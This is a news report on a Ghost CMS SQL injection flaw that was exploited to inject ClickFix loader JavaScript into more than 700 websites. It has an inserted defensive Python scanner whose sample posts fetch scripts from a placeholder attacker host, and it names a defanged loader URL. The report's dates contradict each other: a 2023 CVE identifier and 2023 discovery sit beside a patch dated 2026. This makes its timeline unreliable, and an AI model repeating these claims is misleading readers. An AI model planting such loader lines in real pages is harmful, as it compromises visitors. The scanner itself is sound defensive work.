
Ghost CMS: Critical Security Vulnerability Compromises Over 700 Websites

Bottom line: Over 700 websites were compromised through a critical Ghost CMS security vulnerability. Attackers are injecting malicious JavaScript code for ClickFix attacks. The vulnerability CVE-2023-26980 enables unauthorized access to admin API keys. A patch has been available since February 2026.

Cybercriminals are exploiting a critical security vulnerability in Ghost CMS to compromise over 700 websites and hijack them for fraudulent ClickFix attacks. The vulnerability CVE-2023-26980 allows attackers to access admin API keys without authentication and manipulate content.

Security researchers from QiAnXin XLab have documented a large-scale campaign in which attackers exploit the critical security vulnerability CVE-2023-26980 in Ghost CMS. The SQL injection vulnerability with a CVSS score of 9.4 was already patched in February 2026 with version 6.19.1, but the damage is substantial.

The attack works in multiple steps: attackers exploit the vulnerability in the Content API to access admin API keys without authentication. Using these keys, they can abuse the Ghost Admin API to manipulate articles in bulk and inject malicious JavaScript code.

The code injected at the end of articles acts as a two-stage loader that fetches further malware from external servers (such as “clo4shara[.]xyz/11z77u3.php”) at runtime. This lets the criminals swap payloads per target while the loader component itself stays unchanged.
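As an added defender-side example (not code from the article or from QiAnXin XLab): a scanner for a Ghost JSON export that flags trailing script tags served from non-allowlisted hosts or carrying loader-style inline code, and reports days on which many posts were updated at once, the two traces of the bulk manipulation described above. The export layout `db[0].data.posts[].html`, the allowlisted host and the sample posts are assumptions constructed for this example.

```python
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}  # assumed site policy for in-post scripts
LOADER_PATTERN = re.compile(r"\b(eval|document\.write|atob|fetch|XMLHttpRequest)\b")

class _ScriptCollector(HTMLParser):
    # Collect each <script> element's src attribute and inline body.
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1]["body"] += data

def find_suspicious_scripts(html):
    """Flag scripts served from non-allowlisted hosts or inline loader-style code."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or "unknown host"
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"external script from {host}")
        elif LOADER_PATTERN.search(s["body"]):
            findings.append("inline loader-style script")
    return findings

def scan_export(export_json, bulk_threshold=3):
    """Return (suspicious scripts per post slug, days with >= bulk_threshold updated posts)."""
    posts = json.loads(export_json)["db"][0]["data"]["posts"]
    hits, per_day = {}, {}
    for p in posts:
        if findings := find_suspicious_scripts(p.get("html") or ""):
            hits[p["slug"]] = findings
        day = (p.get("updated_at") or "")[:10]  # bulk edits via the Admin API cluster by day
        per_day[day] = per_day.get(day, 0) + 1
    return hits, sorted(d for d, n in per_day.items() if d and n >= bulk_threshold)

# Constructed sample export (not real data); the loader host is a placeholder.
SAMPLE_EXPORT = json.dumps({"db": [{"data": {"posts": [
    {"slug": "allowed", "updated_at": "2026-03-01T09:00:00.000Z", "html": "<p>Hi</p><script src=\"https://cdn.example.com/lib.js\"></script>"},
    {"slug": "hit-a", "updated_at": "2026-03-01T09:01:00.000Z", "html": "<p>A</p><script src=\"//loader.attacker.invalid/x.php\"></script>"},
    {"slug": "hit-b", "updated_at": "2026-03-01T09:02:00.000Z", "html": "<p>B</p><script>fetch('https://loader.attacker.invalid/x.php')</script>"},
]}}]})
```

Running `scan_export(SAMPLE_EXPORT)` reports the two injected posts and the single day on which all three were edited; on a real export, treat a flagged day together with unexpected script hosts as a prompt to rotate the admin API keys and re-check post content.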

At least two different attacker groups are responsible for the campaign, sometimes compromising websites on the same day they are discovered. The discovery was made on May 7, 2023. The targets span various industries: universities, blockchain projects, artificial intelligence, SaaS platforms, security research institutions, media, and fintech companies.

These compromises of legitimate websites significantly increase the effectiveness of ClickFix attacks, as users encounter the fraudulent code on what appear to be trustworthy sites.
